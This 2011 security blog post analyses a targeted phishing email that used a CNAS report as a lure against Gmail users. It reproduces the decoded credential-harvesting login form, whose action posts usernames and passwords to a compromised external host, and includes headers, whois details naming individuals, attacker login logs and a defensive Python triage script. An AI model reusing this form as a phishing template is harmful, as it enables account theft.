Thursday, August 11, 2011

Targeted attacks against personal Gmail accounts Part II - CNAS Report


I am posting this only to highlight the fact that once compromises happen and are covered in the news, they do not disappear and attackers don't give up or stop. They continue their business as usual. Here is a small update to the post dated Feb 17, 2011, Targeted attacks against personal accounts of military, government employees and associates. This post was mentioned a few times in the news thanks to Google's mention of it in their blog post in June 2011.


I received a phishing email sample indicating that the attackers described in the above post continue their efforts with very slight modifications to the original themes, and I must note that this incident is even simpler than the previous one. I don't know if any accounts were compromised this time; I hope the public disclosure of the previous attacks, along with the notifications on forwarding rules and two-factor authentication in Gmail, helped prevent most if not all compromises.

P.S. Google are aware of this; there is not much they can do to prevent these from coming in, but I am sure they are trying. If you are concerned about your account safety, please use two-factor authentication and change your passwords often.

General threat information

Type

Login form in an HTML message offering to "activate" a subscription to CNAS publications, using this actual publication as a lure: CNAS Report Calls Declining Satellite Capabilities National Security Concern.

Distribution and targets:
Email link: a targeted phishing message sent to the Gmail account of a person associated with political and international affairs (in this case). Links are customized and individualized for each target. The sender address is spoofed to look like that of a very close associate.

See another example of password theft attempts posted by Lotta here
August 10 - Details of First Chinese Aircraft Carrier Revealed

Attack approach:
Victims get a message from the spoofed address of a close associate or a collaborating organization/agency. The message is crafted to look like a subscription form that asks for Gmail credentials to activate the subscription. Since many services use Google login for authentication, this is not expected to alarm the recipient. As soon as credentials are entered, the following happens:

= Credentials get posted / sent to a server in Houston, TX
= The recipient gets redirected back to Gmail, already logged in, so ends up back in the inbox
= Attackers log in to the compromised account within a few hours and then at least twice daily to check and read mail.

Note: no forwarding rules were set up by attackers for the duration of the testing.

Original message

---------- Forwarded message ----------
From: XXXXXXXXX
Date: Tue, Aug 2, 2011 at 7:55 AM
Subject: CNAS Report Calls Declining Satellite Capabilities National Security Concern
To: XXXXXXXXXXXXXXXX@gmail.com


Your account will be locked for unusual account activity, which includes, but is not limited to:
1.    Receiving, deleting, or downloading large amounts of mail via POP or IMAP in a short period of time.
2.    Sending a large number of undeliverable messages (messages that bounce back).
3.    Using file-sharing or file-storage software, browser extensions, or third party software that automatically logs in to your account.
4.    Leaving multiple instances of Gmail open.Browser-related issues. Please note that if you find your browser continually reloading while attempting to access your Inbox, it's probably a browser issue, and it may be necessary to clear your browser's cache and cookies.
Please log in the Gmail Server to activate your account:

Headers and sender

The HTML code of the email is Base64 encoded and, upon decoding, presents the form above with the recipient's login email address already hardcoded in it.

Partial headers and email "original" view:
........................
Received: from omh-ma01.r1000.mx.aol.com (omh-ma01.r1000.mx.aol.com [172.29.41.7])
    by mtaout-da03.r1000.mx.aol.com (MUA/Third Party Client Interface) with ESMTP id 663DEE0000F1
    for XXXXXXXX@gmail.com>; Tue,  2 Aug 2011 08:03:11 -0400 (EDT)
Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2])
    by omh-ma01.r1000.mx.aol.com (AOL Outbound Holding Interface) with ESMTP id 5CDF8E000086
    for XXXXXXXX@gmail.com>; Tue,  2 Aug 2011 08:03:11 -0400 (EDT)
Received: from web-server (unknown [122.146.219.130])
    by mtaout-ma02.r1000.mx.aol.com (MUA/Third Party Client Interface) with SMTP id 40157E000F42
    for XXXXXXXX@gmail.com>; Tue,  2 Aug 2011 08:03:07 -0400 (EDT)
Date: Tue, 02 Aug 2011 19:55:19 +0800
From: XXXXXXXXXXXXX
To: XXXXXXXXXX
Subject: CNAS Report Calls Declining Satellite Capabilities National Security Concern
X-Mailer: Foxmail 6, 10, 201, 20  - Commonly used in Chinese made phishing attacks
Mime-Version: 1.0
Content-Type: text/html;
Content-Transfer-Encoding: base64
X-AOL-SCOLL-SCORE: 1:2:254689392:93952408 
X-AOL-SCOLL-URL_COUNT: 2 
X-AOL-IP: 122.146.219.130  -Taiwan
x-aol-global-disposition: G
X-AOL-SCOLL-SCORE: 1:2:278191424:93952408 
X-AOL-SCOLL-URL_COUNT: 2 
x-aol-sid: 3039ac1d33834e37e77f14f3
.............

Sender IP 

122.146.219.130   - was used for malicious mailings of all kinds more than once before

122.146.219.130
122-146-219-130.static.sparqnet.net
Host reachable, 249 ms. average

122.146.219.128 - 122.146.219.143
Meiqiu,Huang
Kaohsiung Taiwan
Taiwan
Sam Chen
Meiqiu,Huang
Kaohsiung Taiwan
stevechen6@hotmail.com

--------------------------------------

Credential harvest

Decoded form HTML code - the recipient address is changed to xxxxxxx@gmail.com and all < and > were replaced with { and }.

*Your account will be locked for unusual account activity, which includes,
but is not limited to:

   1. Receiving, deleting, or downloading large amounts of mail via POP or
   IMAP in a short period of time.
   2. Sending a large number of undeliverable messages (messages that bounce
   back).
   3. Using file-sharing or file-storage software, browser extensions, or
   third party software that automatically logs in to your account.
   4. Leaving multiple instances of Gmail open.Browser-related issues.
   Please note that if you find your browser continually reloading while
   attempting to access your Inbox, it's probably a browser issue, and it may
   be necessary to clear your browser's cache and cookies.

Please log in the Gmail Server to activate your account:
        account  Log in
Username:
        Password:        Save my information in this computer
  *

......... Subject: CNAS Report Calls Declining Satellite Capabilities National Securi=
ty Concern{br}To: {a href=3D"mailto:xxxxxxxxxxxx@gmail.com"}xxxxxx=
y@gmail.com{/a}{br}{br}{br}{b}Your account will be locked for unusual accou=
nt activity, which includes, but is not limited to:{br}


{ol}
{li}Receiving, deleting, or downloading large amounts of mail via POP or IM=
AP in a short period of time.{/li}
{li}Sending a large number of undeliverable messages (messages that bounce =
back).{/li}
{li}Using file-sharing or file-storage software, browser extensions, or thi=
rd party software that automatically logs in to your account.{/li}
{li}Leaving multiple instances of Gmail open.Browser-related issues. Please=
 note that if you find your browser continually reloading while attempting =
to access your Inbox, it's probably a browser issue, and it may be nece=
ssary to clear your browser's cache and cookies. {/li}


{/ol}
{p}Please log in the Gmail Server to activate your account:{/p}
{form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.soft=
echglobal.com/account/activation.asp" method=3D"post" target=3D"_blank" ons=
ubmit=3D"alert("This form has been disabled."); return false"}{di=
v name=3D"gaia_loginbox"}


{table border=3D"0" cellpadding=3D"5" cellspacing=3D"3" width=3D"800"}=20
 {tbody}{tr}=20
{td style=3D"text-align:center" bgcolor=3D"#e8eefa" nowrap valign=3D"top"} =
=20
{input name=3D"ltmpl" value=3D"default" type=3D"hidden"}=20
{input name=3D"ltmplcache" value=3D"2" type=3D"hidden"}
  {div}
{table align=3D"center" border=3D"0" cellpadding=3D"1" cellspacing=3D"0"}=
=20
{tbody}{tr}
{td colspan=3D"2" align=3D"center"}=20
{table}
{tbody}{tr}
{td valign=3D"top"}=20
{b}{img}{/b}{/td}=20
 {td valign=3D"middle"} =20
{font size=3D"-0"}{b}account{/b}{/font}=20
{/td} =20
{/tr}
{/tbody}{/table}
{font size=3D"-1"}Log in{/font}
{/td}{/tr} =20
{tr} =20
{td colspan=3D"2" align=3D"center"}{/td}{/tr}
{tr}=20
{td nowrap} =20
{div align=3D"center"}{span}Username:{/span}{/div} =20
{/td}=20
{td}
{input name=3D"service" value=3D"mail" type=3D"hidden"} =20
{input name=3D"rm" value=3D"false" type=3D"hidden"}=20
{input name=3D"id" value=3D"22626" type=3D"hidden"}=20
{input name=3D"ltmpl" value=3D"default" type=3D"hidden"}=20
 {input name=3D"GALX" value=3D"NIE34iN5DYQ" type=3D"hidden"}=20
 {input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" typ=
e=3D"text"}{/td}
{/tr}=20
{tr}{td}{/td} =20
{td align=3D"left"} {/td}=20
{/tr}=20
{tr} =20
{td align=3D"center"}  =20
{span}Password:{/span}{/td}  =20
{td}  =20
{input name=3D"myPasswd" size=3D"18" value=3D"" type=3D"password"}{/td}=20
{/tr}=20
{tr} =20
{td}  =20
{/td}  =20
{td align=3D"left"}=20
{/td}=20
{/tr} =20
{tr} =20
{td align=3D"right" valign=3D"top"}=20
{input name=3D"PersistentCookie" value=3D"yes" type=3D"checkbox"}  =20
{input name=3D"rmShown" value=3D"1" type=3D"hidden"}  =20
{/td} =20
{td}{span}Save my information in this computer{/span}{/td}=20
{/tr}=20
{tr} =20
{td}=20
{/td} =20
{td align=3D"left"} =20
{input name=3D"signIn" value=3D"Activate" type=3D"submit"}=20
 {/td}=20
{/tr}=20
{tr}  =20
{td colspan=3D"2" align=3D"center" height=3D"33" valign=3D"bottom"}   =20
{/td}=20
{/tr} =20
 {/tbody}{/table}  =20
{/div} =20
 {/td}  =20
{/tr}=20
{/tbody}{/table}=20
{/div}{/form}{/b}=20

{/div}{br}{/div}

--0022154018566f409004a9c738bd--

Some parts of interest:

Please log in the Gmail Server to activate your account:{/p}
{form name=3D"1318a6060f9f02b2_mygmail_loginform" action=3D"http://www.soft=
echglobal.com/account/activation.asp
" method=3D"post" target=3D"_blank" ons=
ubmit=3D"alert("This form has been disabled."); return false"}{di=
v name=3D"gaia_loginbox"}
--------------------------------
{input name=3D"GALX" value=3D"NIE34iN5DYQ" type=3D"hidden"}=20
 {input name=3D"myEmail" size=3D"18" value=3D"xxxxxxxxxxxxxxx@gmail.com" typ=
e=3D"text"}{/td}
As you can see, the form results get posted to softechglobal.com/account/activation.asp, and each copy of the form is marked with an ID of sorts: the hidden field GALX with value "NIE34iN5DYQ" (the field names such as gaia_loginbox, GALX and PersistentCookie are those of Google's real login form of the time, from which the form was copied).
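As an added detection example (my code, not the post's own or anyone's analysis tooling), the following Python triages a message like the one dissected above: it walks the Received chain to recover the first public originating IP and decodes the base64 HTML body to find a password form whose action posts outside Google. The sample message is a constructed, trimmed copy of the headers and form shown on this page.

```python
import base64
import email
import ipaddress
import re
from urllib.parse import urlparse

# Constructed sample (not the captured mail): a trimmed copy of the Received chain
# shown in the post, with a base64 text/html body that carries the login form.
FORM_HTML = (
    '<p>Please log in the Gmail Server to activate your account:</p>'
    '<form name="mygmail_loginform" method="post"'
    ' action="http://www.softechglobal.com/account/activation.asp">'
    '<input name="GALX" value="NIE34iN5DYQ" type="hidden">'
    '<input name="myEmail" value="xxxxxxx@gmail.com" type="text">'
    '<input name="myPasswd" type="password"></form>'
)
RAW_MESSAGE = (
    "Received: from mtaout-ma02.r1000.mx.aol.com (mtaout-ma02.r1000.mx.aol.com [172.29.41.2])\r\n"
    "\tby omh-ma01.r1000.mx.aol.com with ESMTP id 5CDF8E000086\r\n"
    "Received: from web-server (unknown [122.146.219.130])\r\n"
    "\tby mtaout-ma02.r1000.mx.aol.com with SMTP id 40157E000F42\r\n"
    "X-Mailer: Foxmail 6, 10, 201, 20\r\n"
    "Content-Type: text/html;\r\nContent-Transfer-Encoding: base64\r\n\r\n"
    + base64.b64encode(FORM_HTML.encode()).decode() + "\r\n"
)
IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FORM_ACTION_RE = re.compile(r'<form[^>]*\baction="([^"]+)"', re.I)
PASSWORD_RE = re.compile(r'<input[^>]*type="password"', re.I)

def originating_ip(msg):
    """Oldest hop first: the first public IP is the host that handed the mail to AOL."""
    for hop in reversed(msg.get_all("Received", [])):
        for ip in IP_RE.findall(hop):
            # the provider's internal RFC1918 hops (172.29.x.x) are not global
            if ipaddress.ip_address(ip).is_global:
                return ip
    return None

def credential_form_targets(msg):
    """If the decoded body has a password field, list hosts its forms post to off-Google."""
    body = msg.get_payload(decode=True).decode("utf-8", "replace")
    if not PASSWORD_RE.search(body):
        return []
    hosts = [urlparse(a).hostname for a in FORM_ACTION_RE.findall(body)]
    return [h for h in hosts if h and not h.endswith(("google.com", "gmail.com"))]

def triage(raw):
    msg = email.message_from_string(raw)
    return {"origin_ip": originating_ip(msg), "x_mailer": msg.get("X-Mailer"),
            "phish_targets": credential_form_targets(msg)}
```

Calling `triage(RAW_MESSAGE)` yields the sender IP 122.146.219.130, the Foxmail X-Mailer and www.softechglobal.com as the credential drop host, which are exactly the three indicators the sections above pull out by hand.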

Softech global Ltd
      Softech global Ltd
      Softech House London Road
      Albourne,  BN6 9BN
      GB
      Phone: +44.1111111111
      Email:

   Registrar Name....: Register.com
   Registrar Whois...: whois.register.com
   Registrar Homepage: www.register.com

   Domain Name: softechglobal.com
      Created on..............: 2011-04-19
      Expires on..............: 2012-08-31

   Administrative Contact:
      Nildram
      Nildram Hostmaster
      1 Triangle Business Park NULL
      Stoke Mandeville,  HP22 5BL
      GB
      Phone: +44.8002982981
      Email:

Credential compromise testing

In order to test the exploit, I made an account closely resembling the recipient account and filled it with Google alerts about human rights and various military issues, random malicious documents, and mail from China related Google groups. The result is not very interesting for a spy but more or less plausible.


I changed the hardcoded Gmail ID of the target in the HTML code and entered the new account's credentials in the resulting "activate" form.

The resulting traffic is as follows:

www.softechglobal.com (70.86.21.146) appears to belong to a legitimate company whose website is hosted at ThePlanet.com Internet Services; that server has been compromised.
 70.86.21.146
92.15.5646.static.theplanet.com
Host reachable, 48 ms. average
70.84.0.0 - 70.87.255.255
ThePlanet.com Internet Services, Inc.
315 Capitol
Suite 205
Houston
TX
77002
United States


-----------------------------------------------------------
www.softechglobal.com Hosting history

Event Date   Action   Pre-Action IP   Post-Action IP
2005-03-05   New      -none-          62.3.208.46
2007-05-27   Change   62.3.208.46     62.3.237.98
2008-06-15   Change   62.3.237.98     70.86.21.146
2011-04-10   New      -none-          70.86.21.146



70.86.21.146 is blacklisted in twelve lists; someone needs to clean it up there.


Post compromise activity

The password thieves did not delay and logged in less than two hours after the compromise.


All logins come from Tor exit nodes, or from what could be a Tor node or maybe a compromised server (vps18345.ovh.net).

For example:
Aug 7, 2011
Browser  United States (74.120.13.132)  8:44 pm   Tor, Germany

Aug 8, 2011
Browser     United States (CA) (184.154.116.155)
SingleHop, Inc.
621 W. Randolph St.
3rd Floor
Chicago
IL
60661
United States

Aug 12
Browser France (46.105.27.26)
vps18345.ovh.net
Host reachable, 112 ms. average, 2 of 4 pings lost
46.105.27.0 - 46.105.27.255
OVH Ltd
VPS
http://www.ovh.co.uk
United Kingdom
Octave Klaba
OVH SAS
2 rue Kellermann
59100 Roubaix
France
phone: +33 9 74 53 13 23
noc@ovh.net

1 comment:

  1. The other thing to look for is a forward set up on your account to another email. At least with human rights activists this was a common tactic so the attackers didn't need to log back into compromised accounts.
